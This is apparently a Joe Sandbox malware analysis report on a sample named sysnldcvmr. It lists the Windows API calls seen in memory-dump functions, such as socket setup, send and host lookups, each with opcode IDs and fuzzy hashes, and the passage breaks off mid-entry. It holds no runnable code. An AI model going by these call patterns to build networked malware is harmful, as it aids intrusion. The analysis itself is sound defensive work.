                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: closesocketconnecthtonsshutdownsocket
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1987800339-0
                                                                                                                                                                                                                                                    • Opcode ID: cbdb9185097dfb3a9a33e6ecced3d904d4b18b7e3af7f03057a5aabe6a457024
                                                                                                                                                                                                                                                    • Instruction ID: 10e4ce005d5f4377fb43720ce7fadd865a0fdbaf8ef4bbe44a4c7335c1314f5f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cbdb9185097dfb3a9a33e6ecced3d904d4b18b7e3af7f03057a5aabe6a457024
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 71113974D05209EBCB10DFA8DA496AEB670AF08320F2043A9E529A73D0D7745F01979A
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 00409E50: GetCurrentProcessId.KERNEL32(?,00409DBB,?,0040C6CE,00000010,?,?,?,?,?,?,0040C43B), ref: 00409E53
                                                                                                                                                                                                                                                    • HeapCreate.KERNEL32(00000000,00000000,00000000,?,?,00409DC7,?,0040C6CE,00000010,?,?,?,?,?,?,0040C43B), ref: 00409E9C
                                                                                                                                                                                                                                                    • HeapSetInformation.KERNEL32(009D0000,00000000,00000002,00000004), ref: 00409EC6
                                                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 00409ECC
                                                                                                                                                                                                                                                      • Part of subcall function 00409EE0: GetProcessHeaps.KERNEL32(000000FF,?), ref: 00409EFC
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Process$CurrentHeap$CreateHeapsInformation
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3179415709-0
                                                                                                                                                                                                                                                    • Opcode ID: f2378abd389c528855b2215640a50ba70f6bde38e81fbf66e01ddb41fd263172
                                                                                                                                                                                                                                                    • Instruction ID: d15e15a0956cd53a3f7420caceedbd75f27766a05eec27fee61015ba2f128238
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f2378abd389c528855b2215640a50ba70f6bde38e81fbf66e01ddb41fd263172
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D1F0B4B0581304ABD724DB71FC05BA637A8A704705F02803EF6089A2D2EAB9DC44CB9C
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 00409E50: GetCurrentProcessId.KERNEL32(?,00409DBB,?,0040C6CE,00000010,?,?,?,?,?,?,0040C43B), ref: 00409E53
                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(009D0000,?,-0000000C), ref: 00409DFA
                                                                                                                                                                                                                                                    • memset.NTDLL ref: 00409E34
                                                                                                                                                                                                                                                      • Part of subcall function 00409E70: HeapCreate.KERNEL32(00000000,00000000,00000000,?,?,00409DC7,?,0040C6CE,00000010,?,?,?,?,?,?,0040C43B), ref: 00409E9C
                                                                                                                                                                                                                                                      • Part of subcall function 00409E70: HeapSetInformation.KERNEL32(009D0000,00000000,00000002,00000004), ref: 00409EC6
                                                                                                                                                                                                                                                      • Part of subcall function 00409E70: GetCurrentProcessId.KERNEL32 ref: 00409ECC
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Heap$CurrentProcess$AllocateCreateInformationmemset
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3494217179-0
                                                                                                                                                                                                                                                    • Opcode ID: d8037d4416afb632a3dc4f98f72e54e87fb15f54c14e696db28e718d2a8b7ec8
                                                                                                                                                                                                                                                    • Instruction ID: bc348cf5c9b079020b3d900c37522172a8fbba108f4db171397f18f444666f8c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d8037d4416afb632a3dc4f98f72e54e87fb15f54c14e696db28e718d2a8b7ec8
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A611FEB5900108BBCB10EFA5D845B9E7BB5AF44305F14C169F909BB382D638DE54CB99
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 004013B0: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,0040D55D,00000000), ref: 004013D5
                                                                                                                                                                                                                                                      • Part of subcall function 004013B0: socket.WS2_32(00000002,00000002,00000011), ref: 004013E4
                                                                                                                                                                                                                                                      • Part of subcall function 004013B0: bind.WS2_32(?,?,00000010), ref: 00401429
                                                                                                                                                                                                                                                      • Part of subcall function 0040B200: EnterCriticalSection.KERNEL32(00416690), ref: 0040B210
                                                                                                                                                                                                                                                      • Part of subcall function 0040B200: LeaveCriticalSection.KERNEL32(00416690), ref: 0040B23C
                                                                                                                                                                                                                                                    • InterlockedExchangeAdd.KERNEL32(00000000,00000000), ref: 0040D57D
                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(000005D4,00001388), ref: 0040D5C7
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CriticalSection$CreateEnterEventExchangeInterlockedLeaveObjectSingleWaitbindsocket
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3920643007-0
                                                                                                                                                                                                                                                    • Opcode ID: a86012ae710333058172dcdbedf12253eac4732d168f1a6e5cd698471d501b85
                                                                                                                                                                                                                                                    • Instruction ID: ebe6697be7004dc57312df383308c6bc29ac17b58d9e4cbca4aa496e4513f42a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a86012ae710333058172dcdbedf12253eac4732d168f1a6e5cd698471d501b85
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1F11A575E00208BBE704EBE4DC4ABAF7734AB04704F148179F901772D1E6B5AA44CB89
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • gethostname.WS2_32(?,00000100), ref: 0040ADEC
                                                                                                                                                                                                                                                    • gethostbyname.WS2_32(?), ref: 0040ADFE
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: gethostbynamegethostname
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3961807697-0
                                                                                                                                                                                                                                                    • Opcode ID: 3e0d64d0359f05fd9a79bfd049c8ca7c81df9b12e882189b7266d53aab3380c0
                                                                                                                                                                                                                                                    • Instruction ID: 4c25e3467811ff68b39612d5822c2a685709a2e0bc46d2761966ab013cae1a79
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3e0d64d0359f05fd9a79bfd049c8ca7c81df9b12e882189b7266d53aab3380c0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4E1112349442288BCB24CF24C848BD9B771AB65314F1886D6D4C9673D0C7F96DD5CF86
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: gethostbynameinet_addr
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1594361348-0
                                                                                                                                                                                                                                                    • Opcode ID: 46542f40318f5cfb28b81fc8c4f0329da453caff3e113274fd4b0c2f7b1fac6b
                                                                                                                                                                                                                                                    • Instruction ID: cb50bac6aa0e7e12dc0343020e8a378ceee1aa6c6dd57b9abb221f5468a140c1
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 46542f40318f5cfb28b81fc8c4f0329da453caff3e113274fd4b0c2f7b1fac6b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D9F0A274900208EFCB14DFE4D54899EBBB4EB49311F1083A6D905573A0D7749E90DF45
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(000005D4,000003E8), ref: 0040B42E
                                                                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(00415260), ref: 0040B440
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: DecrementInterlockedObjectSingleWait
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4086267124-0
                                                                                                                                                                                                                                                    • Opcode ID: 040714827fe75f1fa5521dd8f7f71bf1496fed6b52bc5ae53ab0c45206f60a91
                                                                                                                                                                                                                                                    • Instruction ID: 19902dc294b38e57afb5a04d7a561a5dae5f2b0dcbf69620d3c261a402e6fa36
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 040714827fe75f1fa5521dd8f7f71bf1496fed6b52bc5ae53ab0c45206f60a91
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FFD0A73164430857C6006BA1EC4ABAA3A2FE710700B50C037F305F11C2CBBCD990979E
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • shutdown.WS2_32(0040AB2D,00000002), ref: 0040AB49
                                                                                                                                                                                                                                                    • closesocket.WS2_32(0040AB2D), ref: 0040AB53
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: closesocketshutdown
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 572888783-0
                                                                                                                                                                                                                                                    • Opcode ID: 25f7de04c8b00f8f37ac4a6d3bc42f69888779e154306af29f6f284285fde8ae
                                                                                                                                                                                                                                                    • Instruction ID: e588004495cc6a7b8ebd8d82ef2c96d96882889d66b7c68133776882e6b5d849
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 25f7de04c8b00f8f37ac4a6d3bc42f69888779e154306af29f6f284285fde8ae
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 39C04C7914020CBBCB549FE5EC4DDD97BACFB48751F108455FA098B251CAB6E9808B94
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(00416690), ref: 0040B210
                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(00416690), ref: 0040B23C
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3168844106-0
                                                                                                                                                                                                                                                    • Opcode ID: 839316003de6d4969e72e9a64bdcbbbec430ca9f73e83315ba2c9423ae0d711a
                                                                                                                                                                                                                                                    • Instruction ID: 4173032fab3eb0730c98540359f75f4152e7c09aa21c3b13d5d70a64086a5cd8
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 839316003de6d4969e72e9a64bdcbbbec430ca9f73e83315ba2c9423ae0d711a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F4E01AB4941208EFCB14DF84FC09BD97B68E704305F12806DE90853390D7B5AE90DA9D
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(00416690,?,0040B3F7), ref: 0040AB68
                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(00416690,?,0040B3F7), ref: 0040AB78
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3168844106-0
                                                                                                                                                                                                                                                    • Opcode ID: 81c3f962b9ec76ce2805c60adb74695caac985be6cbd1f024fba086166782042
                                                                                                                                                                                                                                                    • Instruction ID: 927706f0d4a3faa36ccdeaf6698e9d1267a6522d247c521c6b95ccff81df7cb1
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 81c3f962b9ec76ce2805c60adb74695caac985be6cbd1f024fba086166782042
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 09B09B341C03059B81103F95BC0BBCC3F1895047653128036FD0954051DDE5B4D4D95F
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 00409E50: GetCurrentProcessId.KERNEL32(?,00409DBB,?,0040C6CE,00000010,?,?,?,?,?,?,0040C43B), ref: 00409E53
                                                                                                                                                                                                                                                    • RtlFreeHeap.NTDLL(009D0000,00000000,00402612,?,00402612,?), ref: 0040A20B
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CurrentFreeHeapProcess
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3855406826-0
                                                                                                                                                                                                                                                    • Opcode ID: 5c77f0e4d4085861ac8a8ab167670b2290c4d540b64ade23244c922168c35f16
                                                                                                                                                                                                                                                    • Instruction ID: 3faa604e5be9d5a0263373ae2e3f7e010bf72a20a2b1d8f85abd2c6c7d5d41cb
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5c77f0e4d4085861ac8a8ab167670b2290c4d540b64ade23244c922168c35f16
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 11F06874900308AFDB04DFD5D8449ADBB75AF94304F10C1AEEA086B381FA36DD51CB95
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • send.WS2_32(00000000,00000000,?,00000000), ref: 0040CCAF
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: send
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2809346765-0
                                                                                                                                                                                                                                                    • Opcode ID: 06370eea5684355e58e3ecca2704a58af4611f1d3e16c80e6b4b5217ad5f95b8
                                                                                                                                                                                                                                                    • Instruction ID: 45736cdf7257a26a41736574bf54bf9ad9d0bdd3ada43f241fa33aa1b29d5f37
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 06370eea5684355e58e3ecca2704a58af4611f1d3e16c80e6b4b5217ad5f95b8
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E201317490834DEFDB00CFA8C884BDD7BB4BB08314F148299E819A7381D3759695DB55
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0040B200: EnterCriticalSection.KERNEL32(00416690), ref: 0040B210
                                                                                                                                                                                                                                                      • Part of subcall function 0040B200: LeaveCriticalSection.KERNEL32(00416690), ref: 0040B23C
                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(000005D4,00001388), ref: 0040CEDC
                                                                                                                                                                                                                                                      • Part of subcall function 0040CAD0: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0040CADC
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CriticalSection$EnterExchangeInterlockedLeaveObjectSingleWait
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3309573332-0
                                                                                                                                                                                                                                                    • Opcode ID: 12ca459a1005339a85f2975bee04b4d743ea4df3d22cee4e9c3de1405843334b
                                                                                                                                                                                                                                                    • Instruction ID: 44ae0f0a1ed3c9862aadb4204bdd5a5f8f47b864d141f75822239993b39a6931
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 12ca459a1005339a85f2975bee04b4d743ea4df3d22cee4e9c3de1405843334b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 91E0927094030CE6D714E7A1D846B6F722AA710305F14427EF501762C2DA7A9E40D7DC
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CoCreateInstance.OLE32(00000000,00000000,00004401,00000000,00000000), ref: 004072E0
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CreateInstance
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 542301482-0
                                                                                                                                                                                                                                                    • Opcode ID: 34e119f03330a37951e29d4ee19d5d58663b392051cfe4a9acefb3e3966ee614
                                                                                                                                                                                                                                                    • Instruction ID: 4030d214640323180f81309a45cda4b6a66b11fae01bbf3bc15f759713f42cbd
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 34e119f03330a37951e29d4ee19d5d58663b392051cfe4a9acefb3e3966ee614
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 07E0ED74D0020CFFDF00DF94C889BDEBBB8AB04315F1081A9F90467280D7B56A94DB95
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 00406320: GetDriveTypeW.KERNEL32(004062FF), ref: 0040632D
                                                                                                                                                                                                                                                    • lstrcpyW.KERNEL32(?,?,?,?,00000019), ref: 00406313
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: DriveTypelstrcpy
